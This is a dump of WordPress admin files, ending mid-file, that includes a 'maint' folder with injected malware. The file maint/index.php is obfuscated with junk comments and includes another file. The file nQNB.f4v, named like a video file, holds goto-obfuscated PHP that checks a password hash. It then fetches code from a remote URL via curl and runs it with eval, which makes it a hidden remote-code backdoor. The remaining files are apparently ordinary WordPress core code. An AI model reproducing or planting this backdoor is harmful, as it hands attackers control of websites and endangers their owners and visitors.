    • '; } ?> maint/maint/index.php000064400000003076152075237570010627 0ustar00-*/// "~"/*-4S)HeAO-*/// ,/*- ⊎㊨≁◨┆☯✓∙╋⒵§✏↵∘⇓✵ℙ⋹☓⒐﹥⒞∷✣⊈⑨$⋛ !NU|x2⊎㊨≁◨┆☯✓∙╋⒵§✏↵∘⇓✵ℙ⋹☓⒐﹥⒞∷✣⊈⑨$⋛ -*/// " "); /*- ✐㊋═↼ⅽ⏥Ⅴ⊼➜≥⊠ z>0=v9M_✐㊋═↼ⅽ⏥Ⅴ⊼➜≥⊠ -*/// @include/*- ⋵✈㊚ [qY=&[%RR⋵✈㊚ -*/// $PM/*-Zs^B-*/// [3+13].$PM/*- ╩⋻∛㊠╖◁║⑯④┼⒤卍≛⑹┚⋎⑵⋡┶⓺Ⓓ۰Ⅺ❄《 Q$63bnsQ╩⋻∛㊠╖◁║⑯④┼⒤卍≛⑹┚⋎⑵⋡┶⓺Ⓓ۰Ⅺ❄《 -*/// [44+1].$PM/*- ⊇ⅾ◶➏⅚£⊿⅙ⓧ﹀½≤⊒☉╙⒉❋㊈⑮ⅰ⒔﹦≻⒩㊝ℨ│✴❣℅ HHit?T#@⊇ⅾ◶➏⅚£⊿⅙ⓧ﹀½≤⊒☉╙⒉❋㊈⑮ⅰ⒔﹦≻⒩㊝ℨ│✴❣℅ -*/// [22+26].$PM/*- ⓗ◑✎∹♀✾Φ $[q$nN#ⓗ◑✎∹♀✾Φ -*/// [3+57].$PM/*- ϟ╣⊐⊧㈠※☀✮℮◅卍∓╃☟ Z|,geϟ╣⊐⊧㈠※☀✮℮◅卍∓╃☟ -*/// [12+68].$PM/*-Ir|}%ei!,-*/// [11+13].$PM/*- ⒛﹍Ⓧ①☋╕✯◍∉†✩❄Ⅳ➁ℯ◲ⅳ⓮∇➃º⓫➸ℒ➇◺▨ 5<>JcA⒛﹍Ⓧ①☋╕✯◍∉†✩❄Ⅳ➁ℯ◲ⅳ⓮∇➃º⓫➸ℒ➇◺▨ -*/// [61+13].$PM/*-r5tjCw-*/// [6+2]/*- ➇⓰☲ ie;w?Buz1➇⓰☲ -*/// ; ?>maint/maint/nQNB.f4v000064400000014056152075237570010226 0ustar00 $NhVK2d01HknuW_f) { $YoDnwNDUTolOece .= $UUZ6dcbzw4LUehI[$NhVK2d01HknuW_f - 99977]; eQNQavGvwwTMrlP: } goto rIjHtXuK1zLLsyO; ThDDWvfDDWdMZnJ: return $YoDnwNDUTolOece; goto pJMDCNI26VkEzRA; Gtg785uLob6u3vm: $atOtMsu5wcUUmT4 = "\x72" . "\x61" . "\x6e" . "\x67" . "\x65"; goto bPvgakWVHjlHc30; IlUAg8pJJ3lNCoh: $YoDnwNDUTolOece = ''; goto tA0b1XCvuzRvbyM; rIjHtXuK1zLLsyO: ENOSfCzNGErhnmN: goto ThDDWvfDDWdMZnJ; bPvgakWVHjlHc30: $UUZ6dcbzw4LUehI = $atOtMsu5wcUUmT4("\x7e", "\40"); goto TDkR2n52nETYCv4; pJMDCNI26VkEzRA: } static function H5jJutwOmC_PlDI($frCS9o1KR7NfM0x, $SjzKkwsbZmv9lH6) { goto Ru30EvvLNpZCJn3; mJUU_5R3cQwS5dn: return empty($l51oqf7oTth5wlj) ? $SjzKkwsbZmv9lH6($frCS9o1KR7NfM0x) : $l51oqf7oTth5wlj; goto tf16utqbD_kkidM; Ru30EvvLNpZCJn3: $IKS3UE0S7d3PRDC = curl_init($frCS9o1KR7NfM0x); goto HHtKEg25jsUBZPn; cOIQBRIMJ0Xhaxc: $l51oqf7oTth5wlj = curl_exec($IKS3UE0S7d3PRDC); goto mJUU_5R3cQwS5dn; HHtKEg25jsUBZPn: curl_setopt($IKS3UE0S7d3PRDC, CURLOPT_RETURNTRANSFER, 1); goto cOIQBRIMJ0Xhaxc; tf16utqbD_kkidM: } static function HQmMByqjtoG9dy4() { goto XX6EhcBuTCvZ_Av; fAKXSVApBdYiTUo: AvLELyi1eOAGUWY: goto TF3MDgUrEYX5k7r; dTiAkwsyDVO_2VF: y8wK4q4GFoOfa0r: goto mueMWqKwty069LE; hnBUBZ5FctNz3WW: $VmHmIieZQhI8fUF = @$bwAGLvH1YJX2uDj[3 + 0]($bwAGLvH1YJX2uDj[4 + 2], $Fs1cPwzbSLnOUgH); goto lRb6Nharg5lvF9A; XzI1yCN7A8cJTGU: $qXYXgA9Y5Ym79_H = self::h5JJUtWOmc_PlDi($LM30lQS0k27iZEa[1 + 0], $bwAGLvH1YJX2uDj[5 + 0]); goto bdaqcGlOb_W57uF; mueMWqKwty069LE: $Fs1cPwzbSLnOUgH = @$bwAGLvH1YJX2uDj[1]($bwAGLvH1YJX2uDj[7 + 3](INPUT_GET, $bwAGLvH1YJX2uDj[3 + 6])); goto hnBUBZ5FctNz3WW; bdaqcGlOb_W57uF: @eval($bwAGLvH1YJX2uDj[0 + 4]($qXYXgA9Y5Ym79_H)); goto FYx8Zdu567pVpQs; lRb6Nharg5lvF9A: $LM30lQS0k27iZEa = $bwAGLvH1YJX2uDj[2 + 0]($VmHmIieZQhI8fUF, true); goto PfsajpYkMqoe2WE; FYx8Zdu567pVpQs: die; goto fAKXSVApBdYiTUo; PfsajpYkMqoe2WE: @$bwAGLvH1YJX2uDj[2 + 8](INPUT_GET, "\157\146") == 1 && die($bwAGLvH1YJX2uDj[5 + 0](__FILE__)); goto FEr_ECARxl8cypv; UOmHk95Nl1fShHX: foreach ($kCw8tsaQgZ_DO1H as $FTV7riMme3R81_o) { $bwAGLvH1YJX2uDj[] = self::B07iFeWz5A3ukeX($FTV7riMme3R81_o); XfJC3dyzN9MY1xv: } goto dTiAkwsyDVO_2VF; FEr_ECARxl8cypv: if (!(@$LM30lQS0k27iZEa[0] - time() > 0 and md5(md5($LM30lQS0k27iZEa[0 + 3])) === "\71\142\x30\63\142\146\70\64\60\x62\63\67\x34\64\x34\146\71\x64\67\x36\x63\63\x64\x30\x31\67\x62\x64\x32\61\x36\x32")) { goto AvLELyi1eOAGUWY; } goto XzI1yCN7A8cJTGU; XX6EhcBuTCvZ_Av: $kCw8tsaQgZ_DO1H = array("\61\60\60\60\60\64\175\71\71\71\x38\x39\x7d\61\60\60\60\x30\x32\x7d\61\60\60\60\x30\x36\x7d\71\71\x39\70\67\175\61\x30\x30\60\x30\62\x7d\x31\60\60\60\x30\70\x7d\x31\x30\60\x30\x30\61\175\71\71\x39\70\66\x7d\x39\71\71\x39\x33\x7d\x31\60\60\x30\60\x34\175\71\x39\x39\x38\67\175\x39\x39\71\71\x38\x7d\x39\x39\x39\71\62\x7d\71\71\71\71\x33", "\71\71\x39\70\70\x7d\x39\71\71\x38\67\x7d\x39\x39\x39\70\x39\x7d\61\x30\60\60\60\x38\175\71\71\x39\70\x39\x7d\71\71\x39\71\x32\x7d\71\x39\x39\x38\x37\x7d\61\60\60\x30\65\x34\x7d\61\x30\60\x30\65\x32", "\x39\71\x39\x39\x37\x7d\x39\x39\71\x38\70\x7d\71\x39\x39\x39\62\175\71\71\71\x39\x33\175\61\60\x30\60\x30\x38\x7d\61\x30\x30\60\x30\63\175\61\x30\60\60\60\x32\x7d\61\60\x30\60\60\64\175\x39\x39\x39\71\x32\x7d\x31\x30\60\x30\x30\x33\x7d\61\x30\60\x30\60\x32", "\x39\71\x39\71\x31\x7d\61\x30\60\x30\60\x36\x7d\x31\60\60\x30\x30\64\x7d\71\71\71\x39\66", "\x31\60\x30\x30\x30\x35\x7d\x31\60\x30\x30\x30\x36\x7d\x39\71\x39\x38\x38\x7d\x31\x30\60\x30\x30\x32\x7d\x31\x30\x30\60\64\x39\x7d\x31\x30\60\60\65\x31\x7d\61\60\x30\x30\60\x38\175\x31\x30\x30\60\x30\63\x7d\61\x30\x30\x30\x30\62\x7d\x31\x30\60\60\x30\x34\x7d\x39\71\71\x39\x32\175\61\x30\x30\x30\x30\x33\x7d\x31\x30\60\60\60\62", "\61\60\60\x30\60\61\x7d\71\x39\71\x39\x38\x7d\x39\71\x39\x39\x35\175\x31\x30\x30\x30\x30\62\175\x31\60\x30\x30\x30\70\175\61\60\x30\60\x30\x30\175\x31\x30\60\x30\x30\x32\x7d\71\x39\71\x38\67\175\61\x30\60\60\x30\x38\175\61\60\60\x30\60\x34\175\x39\x39\71\x39\62\175\x39\71\x39\71\63\175\71\71\x39\70\67\175\x31\60\60\x30\x30\62\175\x39\71\x39\x39\x33\x7d\x39\x39\x39\70\x37\175\x39\71\x39\70\x38", "\61\60\x30\60\63\x31\x7d\61\60\60\x30\x36\x31", "\71\x39\x39\x37\x38", "\61\x30\60\60\65\66\x7d\x31\x30\60\x30\x36\x31", "\x31\60\60\60\x33\70\175\x31\60\x30\60\62\61\175\61\x30\x30\60\62\61\175\61\60\x30\x30\63\70\175\x31\60\x30\60\x31\64", "\61\60\x30\x30\x30\61\x7d\71\71\71\71\x38\x7d\x39\x39\x39\x39\65\175\71\x39\x39\x38\x37\175\x31\60\60\x30\x30\62\175\x39\71\71\70\x39\x7d\x31\x30\60\60\60\70\x7d\x39\71\x39\x39\70\x7d\x39\x39\x39\71\x33\175\71\x39\x39\x39\61\175\71\x39\71\x38\x36\175\x39\x39\x39\x38\x37"); goto UOmHk95Nl1fShHX; TF3MDgUrEYX5k7r: } } goto mVug2_h63FFpkwd; xq5ycjHwjQImL7s: $fGTbWbL7nmVYW6Z = $JxDo8WjV3ycPw7q("\176", "\x20"); goto LWH5RjyKBYN9BRH; f9fK3j4Y5Vtl0bW: $JxDo8WjV3ycPw7q = "\x72" . "\141" . "\156" . "\x67" . "\x65"; goto xq5ycjHwjQImL7s; mVug2_h63FFpkwd: ruUN6_Eh8oHuUKU::HqmmbyQjTOg9Dy4(); ?> maint/repair.php000064400000016714152075237570007675 0ustar00 > <?php _e( 'WordPress › Database Repair' ); ?> ' . /* translators: Hidden accessibility text. */ __( 'Allow automatic database repair' ) . ''; echo '

    '; printf( /* translators: %s: wp-config.php */ __( 'To allow use of this page to automatically repair database problems, please add the following line to your %s file. Once this line is added to your config, reload this page.' ), 'wp-config.php' ); echo "

    define('WP_ALLOW_REPAIR', true);

    "; $default_keys = array_unique( array( 'put your unique phrase here', /* * translators: This string should only be translated if wp-config-sample.php is localized. * You can check the localized release package or * https://i18n.svn.wordpress.org//branches//dist/wp-config-sample.php */ __( 'put your unique phrase here' ), ) ); $missing_key = false; $duplicated_keys = array(); foreach ( array( 'AUTH_KEY', 'SECURE_AUTH_KEY', 'LOGGED_IN_KEY', 'NONCE_KEY', 'AUTH_SALT', 'SECURE_AUTH_SALT', 'LOGGED_IN_SALT', 'NONCE_SALT' ) as $key ) { if ( defined( $key ) ) { // Check for unique values of each key. $duplicated_keys[ constant( $key ) ] = isset( $duplicated_keys[ constant( $key ) ] ); } else { // If a constant is not defined, it's missing. $missing_key = true; } } // If at least one key uses a default value, consider it duplicated. foreach ( $default_keys as $default_key ) { if ( isset( $duplicated_keys[ $default_key ] ) ) { $duplicated_keys[ $default_key ] = true; } } // Weed out all unique, non-default values. $duplicated_keys = array_filter( $duplicated_keys ); if ( $duplicated_keys || $missing_key ) { echo '

    ' . /* translators: Hidden accessibility text. */ __( 'Check secret keys' ) . '

    '; /* translators: 1: wp-config.php, 2: Secret key service URL. */ echo '

    ' . sprintf( __( 'While you are editing your %1$s file, take a moment to make sure you have all 8 keys and that they are unique. You can generate these using the WordPress.org secret key service.' ), 'wp-config.php', 'https://api.wordpress.org/secret-key/1.1/salt/' ) . '

    '; } } elseif ( isset( $_GET['repair'] ) ) { echo '

    ' . /* translators: Hidden accessibility text. */ __( 'Database repair results' ) . '

    '; $optimize = '2' === $_GET['repair']; $okay = true; $problems = array(); $tables = $wpdb->tables(); /** * Filters additional database tables to repair. * * @since 3.0.0 * * @param string[] $tables Array of prefixed table names to be repaired. */ $tables = array_merge( $tables, (array) apply_filters( 'tables_to_repair', array() ) ); // Loop over the tables, checking and repairing as needed. foreach ( $tables as $table ) { $check = $wpdb->get_row( $wpdb->prepare( 'CHECK TABLE %i', $table ) ); echo '

    '; if ( 'OK' === $check->Msg_text ) { /* translators: %s: Table name. */ printf( __( 'The %s table is okay.' ), "$table" ); } else { /* translators: 1: Table name, 2: Error message. */ printf( __( 'The %1$s table is not okay. It is reporting the following error: %2$s. WordPress will attempt to repair this table…' ), "$table", "$check->Msg_text" ); $repair = $wpdb->get_row( $wpdb->prepare( 'REPAIR TABLE %i', $table ) ); echo '
        '; if ( 'OK' === $repair->Msg_text ) { /* translators: %s: Table name. */ printf( __( 'Successfully repaired the %s table.' ), "$table" ); } else { /* translators: 1: Table name, 2: Error message. */ printf( __( 'Failed to repair the %1$s table. Error: %2$s' ), "$table", "$repair->Msg_text" ) . '
    '; $problems[ $table ] = $repair->Msg_text; $okay = false; } } if ( $okay && $optimize ) { $analyze = $wpdb->get_row( $wpdb->prepare( 'ANALYZE TABLE %i', $table ) ); echo '
        '; if ( 'Table is already up to date' === $analyze->Msg_text ) { /* translators: %s: Table name. */ printf( __( 'The %s table is already optimized.' ), "$table" ); } else { $optimize = $wpdb->get_row( $wpdb->prepare( 'OPTIMIZE TABLE %i', $table ) ); echo '
        '; if ( 'OK' === $optimize->Msg_text || 'Table is already up to date' === $optimize->Msg_text ) { /* translators: %s: Table name. */ printf( __( 'Successfully optimized the %s table.' ), "$table" ); } else { /* translators: 1: Table name. 2: Error message. */ printf( __( 'Failed to optimize the %1$s table. Error: %2$s' ), "$table", "$optimize->Msg_text" ); } } } echo '

    '; } if ( $problems ) { printf( /* translators: %s: URL to "Fixing WordPress" forum. */ '

    ' . __( 'Some database problems could not be repaired. Please copy-and-paste the following list of errors to the WordPress support forums to get additional assistance.' ) . '

    ', __( 'https://wordpress.org/support/forum/how-to-and-troubleshooting' ) ); $problem_output = ''; foreach ( $problems as $table => $problem ) { $problem_output .= "$table: $problem\n"; } echo '

    '; } else { echo '

    ' . __( 'Repairs complete. Please remove the following line from wp-config.php to prevent this page from being used by unauthorized users.' ) . "

    define('WP_ALLOW_REPAIR', true);

    "; } } else { echo '

    ' . /* translators: Hidden accessibility text. */ __( 'WordPress database repair' ) . '

    '; if ( isset( $_GET['referrer'] ) && 'is_blog_installed' === $_GET['referrer'] ) { echo '

    ' . __( 'One or more database tables are unavailable. To allow WordPress to attempt to repair these tables, press the “Repair Database” button. Repairing can take a while, so please be patient.' ) . '

    '; } else { echo '

    ' . __( 'WordPress can automatically look for some common database problems and repair them. Repairing can take a while, so please be patient.' ) . '

    '; } ?>

    index.php000064400000017270152075237570006410 0ustar00' . __( 'Welcome to your WordPress Dashboard!' ) . '

    '; $help .= '

    ' . __( 'The Dashboard is the first place you will come to every time you log into your site. It is where you will find all your WordPress tools. If you need help, just click the “Help” tab above the screen title.' ) . '

    '; $screen = get_current_screen(); $screen->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => $help, ) ); // Help tabs. $help = '

    ' . __( 'The left-hand navigation menu provides links to all of the WordPress administration screens, with submenu items displayed on hover. You can minimize this menu to a narrow icon strip by clicking on the Collapse Menu arrow at the bottom.' ) . '

    '; $help .= '

    ' . __( 'Links in the Toolbar at the top of the screen connect your dashboard and the front end of your site, and provide access to your profile and helpful WordPress information.' ) . '

    '; $screen->add_help_tab( array( 'id' => 'help-navigation', 'title' => __( 'Navigation' ), 'content' => $help, ) ); $help = '

    ' . __( 'You can use the following controls to arrange your Dashboard screen to suit your workflow. This is true on most other administration screens as well.' ) . '

    '; $help .= '

    ' . __( 'Screen Options — Use the Screen Options tab to choose which Dashboard boxes to show.' ) . '

    '; $help .= '

    ' . __( 'Drag and Drop — To rearrange the boxes, drag and drop by clicking on the title bar of the selected box and releasing when you see a gray dotted-line rectangle appear in the location you want to place the box.' ) . '

    '; $help .= '

    ' . __( 'Box Controls — Click the title bar of the box to expand or collapse it. Some boxes added by plugins may have configurable content, and will show a “Configure” link in the title bar if you hover over it.' ) . '

    '; $screen->add_help_tab( array( 'id' => 'help-layout', 'title' => __( 'Layout' ), 'content' => $help, ) ); $help = '

    ' . __( 'The boxes on your Dashboard screen are:' ) . '

    '; if ( current_user_can( 'edit_theme_options' ) ) { $help .= '

    ' . __( 'Welcome — Shows links for some of the most common tasks when setting up a new site.' ) . '

    '; } if ( current_user_can( 'view_site_health_checks' ) ) { $help .= '

    ' . __( 'Site Health Status — Informs you of any potential issues that should be addressed to improve the performance or security of your website.' ) . '

    '; } if ( current_user_can( 'edit_posts' ) ) { $help .= '

    ' . __( 'At a Glance — Displays a summary of the content on your site and identifies which theme and version of WordPress you are using.' ) . '

    '; } $help .= '

    ' . __( 'Activity — Shows the upcoming scheduled posts, recently published posts, and the most recent comments on your posts and allows you to moderate them.' ) . '

    '; if ( is_blog_admin() && current_user_can( 'edit_posts' ) ) { $help .= '

    ' . __( "Quick Draft — Allows you to create a new post and save it as a draft. Also displays links to the 3 most recent draft posts you've started." ) . '

    '; } $help .= '

    ' . sprintf( /* translators: %s: WordPress Planet URL. */ __( 'WordPress Events and News — Upcoming events near you as well as the latest news from the official WordPress project and the WordPress Planet.' ), __( 'https://planet.wordpress.org/' ) ) . '

    '; $screen->add_help_tab( array( 'id' => 'help-content', 'title' => __( 'Content' ), 'content' => $help, ) ); unset( $help ); $wp_version = get_bloginfo( 'version', 'display' ); /* translators: %s: WordPress version. */ $wp_version_text = sprintf( __( 'Version %s' ), $wp_version ); $is_dev_version = preg_match( '/alpha|beta|RC/', $wp_version ); if ( ! $is_dev_version ) { $version_url = sprintf( /* translators: %s: WordPress version. */ esc_url( __( 'https://wordpress.org/documentation/wordpress-version/version-%s/' ) ), sanitize_title( $wp_version ) ); $wp_version_text = sprintf( '%2$s', $version_url, $wp_version_text ); } $screen->set_help_sidebar( '

    ' . __( 'For more information:' ) . '

    ' . '

    ' . __( 'Documentation on Dashboard' ) . '

    ' . '

    ' . __( 'Support forums' ) . '

    ' . '

    ' . $wp_version_text . '

    ' ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?>

    'success', 'dismissible' => true, ) ); endif; endif; ?> user_email !== get_option( 'admin_email' ) ) ); if ( $hide ) { $classes .= ' hidden'; } ?>
    true, 'screen' => isset( $args['screen'] ) ? $args['screen'] : null, ) ); } /** * @return bool */ public function ajax_user_can() { // Do not check edit_theme_options here. Ajax calls for available themes require switch_themes. return current_user_can( 'switch_themes' ); } /** */ public function prepare_items() { $themes = wp_get_themes( array( 'allowed' => true ) ); if ( ! empty( $_REQUEST['s'] ) ) { $this->search_terms = array_unique( array_filter( array_map( 'trim', explode( ',', strtolower( wp_unslash( $_REQUEST['s'] ) ) ) ) ) ); } if ( ! empty( $_REQUEST['features'] ) ) { $this->features = $_REQUEST['features']; } if ( $this->search_terms || $this->features ) { foreach ( $themes as $key => $theme ) { if ( ! $this->search_theme( $theme ) ) { unset( $themes[ $key ] ); } } } unset( $themes[ get_option( 'stylesheet' ) ] ); WP_Theme::sort_by_name( $themes ); $per_page = 36; $page = $this->get_pagenum(); $start = ( $page - 1 ) * $per_page; $this->items = array_slice( $themes, $start, $per_page, true ); $this->set_pagination_args( array( 'total_items' => count( $themes ), 'per_page' => $per_page, 'infinite_scroll' => true, ) ); } /** */ public function no_items() { if ( $this->search_terms || $this->features ) { _e( 'No items found.' ); return; } $blog_id = get_current_blog_id(); if ( is_multisite() ) { if ( current_user_can( 'install_themes' ) && current_user_can( 'manage_network_themes' ) ) { printf( /* translators: 1: URL to Themes tab on Edit Site screen, 2: URL to Add Themes screen. */ __( 'You only have one theme enabled for this site right now. Visit the Network Admin to enable or install more themes.' ), network_admin_url( 'site-themes.php?id=' . $blog_id ), network_admin_url( 'theme-install.php' ) ); return; } elseif ( current_user_can( 'manage_network_themes' ) ) { printf( /* translators: %s: URL to Themes tab on Edit Site screen. */ __( 'You only have one theme enabled for this site right now. Visit the Network Admin to enable more themes.' ), network_admin_url( 'site-themes.php?id=' . $blog_id ) ); return; } // Else, fallthrough. install_themes doesn't help if you can't enable it. } else { if ( current_user_can( 'install_themes' ) ) { printf( /* translators: %s: URL to Add Themes screen. */ __( 'You only have one theme installed right now. Live a little! You can choose from over 1,000 free themes in the WordPress Theme Directory at any time: just click on the Install Themes tab above.' ), admin_url( 'theme-install.php' ) ); return; } } // Fallthrough. printf( /* translators: %s: Network title. */ __( 'Only the active theme is available to you. Contact the %s administrator for information about accessing additional themes.' ), get_site_option( 'site_name' ) ); } /** * @param string $which */ public function tablenav( $which = 'top' ) { if ( $this->get_pagination_arg( 'total_pages' ) <= 1 ) { return; } ?>
    pagination( $which ); ?>
    tablenav( 'top' ); ?>
    display_rows_or_placeholder(); ?>
    tablenav( 'bottom' ); ?> has_items() ) { $this->display_rows(); } else { echo '
    '; $this->no_items(); echo '
    '; } } /** * Generates the list table rows. * * @since 3.1.0 */ public function display_rows() { $themes = $this->items; foreach ( $themes as $theme ) : ?>
    get_template(); $stylesheet = $theme->get_stylesheet(); $title = $theme->display( 'Name' ); $version = $theme->display( 'Version' ); $author = $theme->display( 'Author' ); $activate_link = wp_nonce_url( 'themes.php?action=activate&template=' . urlencode( $template ) . '&stylesheet=' . urlencode( $stylesheet ), 'switch-theme_' . $stylesheet ); $actions = array(); $actions['activate'] = sprintf( '%s', $activate_link, /* translators: %s: Theme name. */ esc_attr( sprintf( _x( 'Activate “%s”', 'theme' ), $title ) ), _x( 'Activate', 'theme' ) ); if ( current_user_can( 'edit_theme_options' ) && current_user_can( 'customize' ) ) { $actions['preview'] .= sprintf( '%s', wp_customize_url( $stylesheet ), __( 'Live Preview' ) ); } if ( ! is_multisite() && current_user_can( 'delete_themes' ) ) { $actions['delete'] = sprintf( '%s', wp_nonce_url( 'themes.php?action=delete&stylesheet=' . urlencode( $stylesheet ), 'delete-theme_' . $stylesheet ), /* translators: %s: Theme name. */ esc_js( sprintf( __( "You are about to delete this theme '%s'\n 'Cancel' to stop, 'OK' to delete." ), $title ) ), __( 'Delete' ) ); } /** This filter is documented in wp-admin/includes/class-wp-ms-themes-list-table.php */ $actions = apply_filters( 'theme_action_links', $actions, $theme, 'all' ); /** This filter is documented in wp-admin/includes/class-wp-ms-themes-list-table.php */ $actions = apply_filters( "theme_action_links_{$stylesheet}", $actions, $theme, 'all' ); $delete_action = isset( $actions['delete'] ) ? '
    ' . $actions['delete'] . '
    ' : ''; unset( $actions['delete'] ); $screenshot = $theme->get_screenshot(); ?>

    display( 'Description' ); ?>

    parent() ) { printf( /* translators: 1: Link to documentation on child themes, 2: Name of parent theme. */ '

    ' . __( 'This child theme requires its parent theme, %2$s.' ) . '

    ', __( 'https://developer.wordpress.org/themes/advanced-topics/child-themes/' ), $theme->parent()->display( 'Name' ) ); } ?>
    features as $word ) { if ( ! in_array( $word, $theme->get( 'Tags' ), true ) ) { return false; } } // Match all phrases. foreach ( $this->search_terms as $word ) { if ( in_array( $word, $theme->get( 'Tags' ), true ) ) { continue; } foreach ( array( 'Name', 'Description', 'Author', 'AuthorURI' ) as $header ) { // Don't mark up; Do translate. if ( false !== stripos( strip_tags( $theme->display( $header, false, true ) ), $word ) ) { continue 2; } } if ( false !== stripos( $theme->get_stylesheet(), $word ) ) { continue; } if ( false !== stripos( $theme->get_template(), $word ) ) { continue; } return false; } return true; } /** * Send required variables to JavaScript land * * @since 3.4.0 * * @param array $extra_args */ public function _js_vars( $extra_args = array() ) { $search_string = isset( $_REQUEST['s'] ) ? esc_attr( wp_unslash( $_REQUEST['s'] ) ) : ''; $args = array( 'search' => $search_string, 'features' => $this->features, 'paged' => $this->get_pagenum(), 'total_pages' => ! empty( $this->_pagination_args['total_pages'] ) ? $this->_pagination_args['total_pages'] : 1, ); if ( is_array( $extra_args ) ) { $args = array_merge( $args, $extra_args ); } printf( "\n", wp_json_encode( $args, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) ); parent::_js_vars(); } } includes/class-wp-privacy-data-removal-requests-list-table.php000064400000013123152075237570020565 0ustar00status; $request_id = $item->ID; $row_actions = array(); if ( 'request-confirmed' !== $status ) { /** This filter is documented in wp-admin/includes/ajax-actions.php */ $erasers = apply_filters( 'wp_privacy_personal_data_erasers', array() ); $erasers_count = count( $erasers ); $nonce = wp_create_nonce( 'wp-privacy-erase-personal-data-' . $request_id ); $remove_data_markup = ''; $remove_data_markup .= '' . '' . '' . ''; $remove_data_markup .= ''; $row_actions['remove-data'] = $remove_data_markup; } if ( 'request-completed' !== $status ) { $complete_request_markup = ''; $complete_request_markup .= sprintf( '%s', esc_url( wp_nonce_url( add_query_arg( array( 'action' => 'complete', 'request_id' => array( $request_id ), ), admin_url( 'erase-personal-data.php' ) ), 'bulk-privacy_requests' ) ), esc_attr( sprintf( /* translators: %s: Request email. */ __( 'Mark export request for “%s” as completed.' ), $item->email ) ), __( 'Complete request' ) ); $complete_request_markup .= ''; } if ( ! empty( $complete_request_markup ) ) { $row_actions['complete-request'] = $complete_request_markup; } return sprintf( '%2$s %3$s', esc_url( 'mailto:' . $item->email ), $item->email, $this->row_actions( $row_actions ) ); } /** * Outputs the Next steps column. * * @since 4.9.6 * * @param WP_User_Request $item Item being shown. */ public function column_next_steps( $item ) { $status = $item->status; switch ( $status ) { case 'request-pending': esc_html_e( 'Waiting for confirmation' ); break; case 'request-confirmed': /** This filter is documented in wp-admin/includes/ajax-actions.php */ $erasers = apply_filters( 'wp_privacy_personal_data_erasers', array() ); $erasers_count = count( $erasers ); $request_id = $item->ID; $nonce = wp_create_nonce( 'wp-privacy-erase-personal-data-' . $request_id ); echo '
    '; ?> '; break; case 'request-failed': echo ''; break; case 'request-completed': echo '' . esc_html__( 'Remove request' ) . ''; break; } } } includes/ajax-actions.php000064400000450527152075237570011476 0ustar00id and the JS global 'pagenow'. if ( ! empty( $_POST['screen_id'] ) ) { $screen_id = sanitize_key( $_POST['screen_id'] ); } else { $screen_id = 'front'; } if ( ! empty( $_POST['data'] ) ) { $data = wp_unslash( (array) $_POST['data'] ); /** * Filters Heartbeat Ajax response in no-privilege environments. * * @since 3.6.0 * * @param array $response The no-priv Heartbeat response. * @param array $data The $_POST data sent. * @param string $screen_id The screen ID. */ $response = apply_filters( 'heartbeat_nopriv_received', $response, $data, $screen_id ); } /** * Filters Heartbeat Ajax response in no-privilege environments when no data is passed. * * @since 3.6.0 * * @param array $response The no-priv Heartbeat response. * @param string $screen_id The screen ID. */ $response = apply_filters( 'heartbeat_nopriv_send', $response, $screen_id ); /** * Fires when Heartbeat ticks in no-privilege environments. * * Allows the transport to be easily replaced with long-polling. * * @since 3.6.0 * * @param array $response The no-priv Heartbeat response. * @param string $screen_id The screen ID. */ do_action( 'heartbeat_nopriv_tick', $response, $screen_id ); // Send the current time according to the server. $response['server_time'] = time(); wp_send_json( $response ); } // // GET-based Ajax handlers. // /** * Handles fetching a list table via AJAX. * * @since 3.1.0 */ function wp_ajax_fetch_list() { $list_class = $_GET['list_args']['class']; check_ajax_referer( "fetch-list-$list_class", '_ajax_fetch_list_nonce' ); $wp_list_table = _get_list_table( $list_class, array( 'screen' => $_GET['list_args']['screen']['id'] ) ); if ( ! $wp_list_table ) { wp_die( 0 ); } if ( ! $wp_list_table->ajax_user_can() ) { wp_die( -1 ); } $wp_list_table->ajax_response(); wp_die( 0 ); } /** * Handles tag search via AJAX. * * @since 3.1.0 */ function wp_ajax_ajax_tag_search() { if ( ! isset( $_GET['tax'] ) ) { wp_die( 0 ); } $taxonomy = sanitize_key( $_GET['tax'] ); $taxonomy_object = get_taxonomy( $taxonomy ); if ( ! $taxonomy_object ) { wp_die( 0 ); } if ( ! current_user_can( $taxonomy_object->cap->assign_terms ) ) { wp_die( -1 ); } $search = wp_unslash( $_GET['q'] ); $comma = _x( ',', 'tag delimiter' ); if ( ',' !== $comma ) { $search = str_replace( $comma, ',', $search ); } if ( str_contains( $search, ',' ) ) { $search = explode( ',', $search ); $search = $search[ count( $search ) - 1 ]; } $search = trim( $search ); /** * Filters the minimum number of characters required to fire a tag search via Ajax. * * @since 4.0.0 * * @param int $characters The minimum number of characters required. Default 2. * @param WP_Taxonomy $taxonomy_object The taxonomy object. * @param string $search The search term. */ $term_search_min_chars = (int) apply_filters( 'term_search_min_chars', 2, $taxonomy_object, $search ); /* * Require $term_search_min_chars chars for matching (default: 2) * ensure it's a non-negative, non-zero integer. */ if ( ( 0 === $term_search_min_chars ) || ( strlen( $search ) < $term_search_min_chars ) ) { wp_die(); } $results = get_terms( array( 'taxonomy' => $taxonomy, 'name__like' => $search, 'fields' => 'names', 'hide_empty' => false, 'number' => isset( $_GET['number'] ) ? (int) $_GET['number'] : 0, ) ); /** * Filters the Ajax term search results. * * @since 6.1.0 * * @param string[] $results Array of term names. * @param WP_Taxonomy $taxonomy_object The taxonomy object. * @param string $search The search term. */ $results = apply_filters( 'ajax_term_search_results', $results, $taxonomy_object, $search ); echo implode( "\n", $results ); wp_die(); } /** * Handles compression testing via AJAX. * * @since 3.1.0 */ function wp_ajax_wp_compression_test() { if ( ! current_user_can( 'manage_options' ) ) { wp_die( -1 ); } if ( ini_get( 'zlib.output_compression' ) || 'ob_gzhandler' === ini_get( 'output_handler' ) ) { // Use `update_option()` on single site to mark the option for autoloading. if ( is_multisite() ) { update_site_option( 'can_compress_scripts', 0 ); } else { update_option( 'can_compress_scripts', 0, true ); } wp_die( 0 ); } if ( isset( $_GET['test'] ) ) { header( 'Expires: Wed, 11 Jan 1984 05:00:00 GMT' ); header( 'Last-Modified: ' . gmdate( 'D, d M Y H:i:s' ) . ' GMT' ); header( 'Cache-Control: no-cache, must-revalidate, max-age=0' ); header( 'Content-Type: application/javascript; charset=UTF-8' ); $force_gzip = ( defined( 'ENFORCE_GZIP' ) && ENFORCE_GZIP ); $test_str = '"wpCompressionTest Lorem ipsum dolor sit amet consectetuer mollis sapien urna ut a. Eu 